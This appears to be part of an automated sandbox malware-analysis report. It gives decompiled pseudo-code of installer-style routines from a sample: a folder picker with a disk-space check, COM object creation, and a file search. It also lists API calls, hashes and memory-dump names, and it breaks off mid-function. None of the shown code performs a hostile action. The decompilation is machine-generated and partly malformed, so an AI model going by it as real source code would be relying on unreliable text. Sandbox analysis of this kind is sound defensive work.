                                                                                                                              Function 00404967 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 78%
                                                                                                                              			E00404967(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f20; // 0x8e3734
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B5E(0x3fb, _t146);
					E004067A1(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B5E(0x3fb, _t146);
							if(E00405EF1(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040651A(0x79ff18, _t146);
							_t87 = E004068E7(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040651A(0x79ff18, _t146);
								_t89 = E00405E94(0x79ff18);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff18,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff18) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff18,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E35(0x79ff18);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff18) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E04(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != _t158) {
									E00404DEC(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff08);
									} else {
										E00404D23(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b04 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404498(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f38 == _t158) {
									E004048C0();
								}
								 *0x7a1f38 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f48;
							_v60 = E00404CBD;
							_v56 = _t146;
							_v68 = E00406557(_t146, 0x7a1f48, _t167, 0x7a0720, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DE9(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8a70 + 0x11c));
								if( *((intOrPtr*)( *0x7a8a70 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E00406557(_t146, 0x7a1f48, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a00, 0x7a1f48) != 0) {
										lstrcatW(_t146, 0x7a6a00);
									}
								}
								 *0x7a1f38 =  *0x7a1f38 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E60(_t146) != 0 && E00405E94(_t146) == 0) {
						E00405DE9(_t146);
					}
					 *0x7a7a38 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404476(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404476(_t167);
					E004044AB(_t166);
					_t138 = E004068E7(8);
					if(_t138 == 0) {
						L53:
						return E004044DD(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                                                              0x00404967
                                                                                                                              0x0040496d
                                                                                                                              0x00404973
                                                                                                                              0x00404980
                                                                                                                              0x0040498e
                                                                                                                              0x00404991
                                                                                                                              0x00404999
                                                                                                                              0x0040499f
                                                                                                                              0x0040499f
                                                                                                                              0x004049ab
                                                                                                                              0x004049ae
                                                                                                                              0x00404a1c
                                                                                                                              0x00404a23
                                                                                                                              0x00404afa
                                                                                                                              0x00404b01
                                                                                                                              0x00404b10
                                                                                                                              0x00404b10
                                                                                                                              0x00404b14
                                                                                                                              0x00404b1e
                                                                                                                              0x00404b2b
                                                                                                                              0x00404b2d
                                                                                                                              0x00404b2d
                                                                                                                              0x00404b3b
                                                                                                                              0x00404b42
                                                                                                                              0x00404b49
                                                                                                                              0x00404b4c
                                                                                                                              0x00404b88
                                                                                                                              0x00404b8a
                                                                                                                              0x00404b90
                                                                                                                              0x00404b95
                                                                                                                              0x00404b99
                                                                                                                              0x00404b9b
                                                                                                                              0x00404b9b
                                                                                                                              0x00404bb7
                                                                                                                              0x00000000
                                                                                                                              0x00404bb9
                                                                                                                              0x00404bbc
                                                                                                                              0x00404bca
                                                                                                                              0x00404bd0
                                                                                                                              0x00404bd1
                                                                                                                              0x00404bd4
                                                                                                                              0x00404bd7
                                                                                                                              0x00000000
                                                                                                                              0x00404bd7
                                                                                                                              0x00404b4e
                                                                                                                              0x00404b50
                                                                                                                              0x00404b54
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404b56
                                                                                                                              0x00404b56
                                                                                                                              0x00404b63
                                                                                                                              0x00404b68
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404b6c
                                                                                                                              0x00404b6e
                                                                                                                              0x00404b6e
                                                                                                                              0x00404b77
                                                                                                                              0x00404b79
                                                                                                                              0x00404b7e
                                                                                                                              0x00404b81
                                                                                                                              0x00404b86
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404b86
                                                                                                                              0x00404be3
                                                                                                                              0x00404bed
                                                                                                                              0x00404bf0
                                                                                                                              0x00404bf3
                                                                                                                              0x00404bfa
                                                                                                                              0x00404bfa
                                                                                                                              0x00404bfc
                                                                                                                              0x00404bfc
                                                                                                                              0x00404c01
                                                                                                                              0x00404c03
                                                                                                                              0x00404c0b
                                                                                                                              0x00404c12
                                                                                                                              0x00404c14
                                                                                                                              0x00404c1f
                                                                                                                              0x00404c1f
                                                                                                                              0x00404c14
                                                                                                                              0x00404c2f
                                                                                                                              0x00404c39
                                                                                                                              0x00404c41
                                                                                                                              0x00404c5c
                                                                                                                              0x00404c43
                                                                                                                              0x00404c4c
                                                                                                                              0x00404c4c
                                                                                                                              0x00404c41
                                                                                                                              0x00404c61
                                                                                                                              0x00404c66
                                                                                                                              0x00404c6b
                                                                                                                              0x00404c74
                                                                                                                              0x00404c74
                                                                                                                              0x00404c7d
                                                                                                                              0x00404c7f
                                                                                                                              0x00404c7f
                                                                                                                              0x00404c8b
                                                                                                                              0x00404c93
                                                                                                                              0x00404c9d
                                                                                                                              0x00404c9d
                                                                                                                              0x00404ca2
                                                                                                                              0x00000000
                                                                                                                              0x00404ca2
                                                                                                                              0x00404b4c
                                                                                                                              0x00404b03
                                                                                                                              0x00404b0a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404b0a
                                                                                                                              0x00404a29
                                                                                                                              0x00404a32
                                                                                                                              0x00404a4c
                                                                                                                              0x00404a51
                                                                                                                              0x00404a5b
                                                                                                                              0x00404a62
                                                                                                                              0x00404a6e
                                                                                                                              0x00404a71
                                                                                                                              0x00404a74
                                                                                                                              0x00404a7b
                                                                                                                              0x00404a83
                                                                                                                              0x00404a86
                                                                                                                              0x00404a8a
                                                                                                                              0x00404a91
                                                                                                                              0x00404a99
                                                                                                                              0x00404af3
                                                                                                                              0x00404a9b
                                                                                                                              0x00404a9c
                                                                                                                              0x00404aa3
                                                                                                                              0x00404aad
                                                                                                                              0x00404ab5
                                                                                                                              0x00404ac2
                                                                                                                              0x00404ad6
                                                                                                                              0x00404ada
                                                                                                                              0x00404ada
                                                                                                                              0x00404ad6
                                                                                                                              0x00404adf
                                                                                                                              0x00404aec
                                                                                                                              0x00404aec
                                                                                                                              0x00404a99
                                                                                                                              0x00000000
                                                                                                                              0x00404a51
                                                                                                                              0x00404a3f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404a45
                                                                                                                              0x00000000
                                                                                                                              0x004049b0
                                                                                                                              0x004049bd
                                                                                                                              0x004049c6
                                                                                                                              0x004049d3
                                                                                                                              0x004049d3
                                                                                                                              0x004049da
                                                                                                                              0x004049e0
                                                                                                                              0x004049e9
                                                                                                                              0x004049ec
                                                                                                                              0x004049ef
                                                                                                                              0x004049f7
                                                                                                                              0x004049fa
                                                                                                                              0x004049fd
                                                                                                                              0x00404a03
                                                                                                                              0x00404a0a
                                                                                                                              0x00404a11
                                                                                                                              0x00404ca8
                                                                                                                              0x00404cba
                                                                                                                              0x00404a17
                                                                                                                              0x00404a1a
                                                                                                                              0x00000000
                                                                                                                              0x00404a1a
                                                                                                                              0x00404a11

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004049B6
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004049E0
                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404A91
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404A9C
                                                                                                                              • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 00404ACE
                                                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404ADA
                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AEC
                                                                                                                                • Part of subcall function 00405B5E: GetDlgItemTextW.USER32(?,?,00000400,00404B23), ref: 00405B71
                                                                                                                                • Part of subcall function 004067A1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76D73420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                                                                                                                                • Part of subcall function 004067A1: CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                                                                                                                                • Part of subcall function 004067A1: CharNextW.USER32(?,00000000,76D73420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                                                                                                                                • Part of subcall function 004067A1: CharPrevW.USER32(?,?,76D73420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BCA
                                                                                                                                • Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                                                                                                                                • Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
                                                                                                                                • Part of subcall function 00404D23: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404DE0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                              • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                              • API String ID: 2624150263-3142480687
                                                                                                                              • Opcode ID: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                                                                                                                              • Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
                                                                                                                              • Opcode Fuzzy Hash: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                                                                                                                              • Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E60( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                                                              0x004021b3
                                                                                                                              0x004021bd
                                                                                                                              0x004021c7
                                                                                                                              0x004021d1
                                                                                                                              0x004021dc
                                                                                                                              0x004021df
                                                                                                                              0x004021f9
                                                                                                                              0x004021fc
                                                                                                                              0x00402202
                                                                                                                              0x00402205
                                                                                                                              0x0040220f
                                                                                                                              0x00402213
                                                                                                                              0x00402213
                                                                                                                              0x00402218
                                                                                                                              0x00402229
                                                                                                                              0x00402231
                                                                                                                              0x004022e8
                                                                                                                              0x004022e8
                                                                                                                              0x004022ef
                                                                                                                              0x00402237
                                                                                                                              0x00402237
                                                                                                                              0x00402246
                                                                                                                              0x0040224a
                                                                                                                              0x0040224d
                                                                                                                              0x00402253
                                                                                                                              0x00402261
                                                                                                                              0x00402264
                                                                                                                              0x00402266
                                                                                                                              0x00402271
                                                                                                                              0x00402271
                                                                                                                              0x00402276
                                                                                                                              0x00402278
                                                                                                                              0x0040227f
                                                                                                                              0x0040227f
                                                                                                                              0x00402282
                                                                                                                              0x0040228b
                                                                                                                              0x0040228e
                                                                                                                              0x00402294
                                                                                                                              0x00402296
                                                                                                                              0x004022a0
                                                                                                                              0x004022a0
                                                                                                                              0x004022a3
                                                                                                                              0x004022ac
                                                                                                                              0x004022af
                                                                                                                              0x004022b8
                                                                                                                              0x004022be
                                                                                                                              0x004022c0
                                                                                                                              0x004022ce
                                                                                                                              0x004022ce
                                                                                                                              0x004022d1
                                                                                                                              0x004022d7
                                                                                                                              0x004022d7
                                                                                                                              0x004022da
                                                                                                                              0x004022e0
                                                                                                                              0x004022e6
                                                                                                                              0x004022fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004022e6
                                                                                                                              0x004022f1
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInstance
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 542301482-0
                                                                                                                              • Opcode ID: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
                                                                                                                              • Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
                                                                                                                              • Opcode Fuzzy Hash: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
                                                                                                                              • Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 39%
                                                                                                                              			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406461( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040651A();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                                                              0x00402923
                                                                                                                              0x0040293e
                                                                                                                              0x00402949
                                                                                                                              0x0040294a
                                                                                                                              0x00402a94
                                                                                                                              0x00402925
                                                                                                                              0x00402928
                                                                                                                              0x0040292b
                                                                                                                              0x0040292e
                                                                                                                              0x0040292e
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFindFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1974802433-0
                                                                                                                              • Opcode ID: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
                                                                                                                              • Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
                                                                                                                              • Opcode Fuzzy Hash: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
                                                                                                                              • Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404EE3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E00404EE3(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
